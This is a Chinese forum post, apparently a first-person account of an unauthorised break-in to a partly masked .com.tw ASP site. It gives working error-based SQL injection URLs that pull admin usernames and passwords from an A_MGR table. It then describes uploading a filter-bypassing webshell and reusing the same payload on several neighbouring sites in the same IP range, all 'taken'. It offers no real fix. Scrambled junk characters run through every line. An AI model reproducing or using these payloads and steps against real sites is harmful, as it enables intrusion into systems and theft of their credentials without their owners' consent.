发现一个注入点
- s& n: u/ r1 [4 ?2 Q' A0 |http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833899 E" U# b$ O) Q0 |# A
# ~" c, }: ?$ y4 w4 x. L9 E6 _
习惯性的加’having1=1--1 i y* C' J; W% H
8 e* w1 F# N- Z7 ]http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
$ V# O8 o7 K Y6 @9 X+ K5 n; |) @) e: X
0
) s$ i0 d: F1 P* P7 j. U
0 S4 ?! F; y7 n* c% g: t" V爆出Diary_A.dl_Title(这时候很激动啊)
( h" {: Y w5 S* N) S; {! `7 S
) M8 T5 ^, I; q$ Y那么继续% I2 u/ x) c0 P1 e3 T& w; ~0 c8 E
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
& ^6 j- Z% R# n' d
8 v7 \) l" z H# r继续,一直爆下去
6 S! f/ A9 k- o& [5 T0 m/ d
( @5 I6 B2 n5 H6 ^爆到几个字段和表段 但是没找到需要的管理用户的字段
x# f" v& a; o) B9 i# e u% z! L/ Z% B" m0 U. n: B. H3 {
蛋疼了 怎么办 然后去后台登陆页看源码: k* t& K; ~6 v7 {" E
3 s& V9 e2 g; H0 M
0
2 [6 `/ F2 U0 D8 Z- U/ X- ~0 ~) p9 h* X/ |) A' }
Input name= “ADUID”
* [2 ^& A6 u( c, ~: p, |0 }Input name= “ADPWD”$ \9 J4 `; @) N6 Q5 ^& w5 i
% Z8 @2 y% `4 ^' ?1 m5 N$ v" g很幸运 找到了字段那就继续8 Y+ V0 P3 m2 H0 T- ]2 W
找到之后开始爆用户
; m+ J* j* R. Chttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—0 L' u9 _4 Q) G2 [: P
爆密码
. o+ y, e+ }1 p4 B U6 A9 R zhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
1 W8 O. r/ x( M# j1 L+ X6 k. H! c测试了下 这个注入点只能爆到文章哪里的表 + Z$ u: N) m6 y1 L& A
$ a0 y' w7 q0 f* h3 {头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
P0 L4 D, m. o. @& c/ }
+ C: Q/ g6 W( v4 ^ b6 T! d又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了& w+ o2 w: X, e% ?$ }& o3 L
/ v) e3 d! H8 z; E473' u5 P1 ?4 w# g6 F' J
; @3 H3 C" k9 _" q7 {
进后台
% M+ ~: Q* F0 Z9 k2 \% U3 O P0 I8 s" J/ z9 n
/ W2 l, C' K1 v
发现几个上传点 有的地方不能上传 而且防止恶意代码) J' |+ l0 @, u. o/ Y3 B. G; ~
; Q1 g1 c' H" x* C7 \. A p4 j2 n
没办法 各种百度各种找大牛 找到一只好像可以突破的马
- l ]2 Z8 V7 @" d8 x% G7 j8 C# d% q3 R+ X- Z
9 @# p" I( e8 F6 A) q2 H0 U
在系统管理那里直接上传 不过没有显示地址
' v; ]& E0 K. x' q5 ^- w
2 n' H# |0 t3 Q4 y, k# U9 k再上传一次 抓包 搞定OK
% q& ~7 W, J- E |3 }
c; R: ]' e3 t5 G7 L) O( A0 H' P1 v' Q2 Z
% w, S7 X9 _ l. s R. G
472
( Y9 J2 V9 s, h3 q* f0 i. k1 n: o4 B' y) ]: s! E) }
晚上不行了 去睡觉。。。
: t% y" c7 d) F+ [" e第二天刚起床 闲的没事做继续日站吧
+ e" w* v5 e- `& \" n9 F$ l) l
- x1 x. r" c/ y7 ?/ A找个站 就把这个站的旁c扫了下( x" e1 G2 b; w2 l2 s- Q
# l; d& N) F \5 j" f- V6 }
发现c段也有一个购物站 ,然后还和这个站的模板差不多0 O* |% M+ B$ _6 H' U% z
* B) k( G; {- |2 Y& {% N, \就找到会员登录口测试
( n l/ P4 F' w( w& ?4 n1 n1 M& s: b6 R h7 J# L. l9 P9 r$ D% b
'and (select top 1 MGR_UID from A_MGR)>0—" p% r: y* B0 G. q& a$ G
果断爆到了 这时候我很激动 通杀
4 ?0 s% W; P: V# I. X5 w2 R X. ]$ c+ c5 H2 @. W0 r+ j, I
再次翻c段5 Q( |# o0 S. U- k; }$ q+ N
3 F( g8 H; T- H& x- X% X8 w: d翻出几个站 都成功拿下- ?# P/ e9 e. H; Z# ?2 L* Q
0 W: F9 [9 `3 H" Q% [% r8 @8 Z! Z! j7 `) n
% S" h! u% G- i$ g j: n
修复方案:
0 L X7 I }0 i( W o9 E他们比我专业 + W) u/ P* r7 j4 Z% ~
* D, m7 C- j+ P7 w( z9 i4 ^# A
A! @; M4 s4 r! e1 V$ p' B6 s
~+ j U4 k8 R
|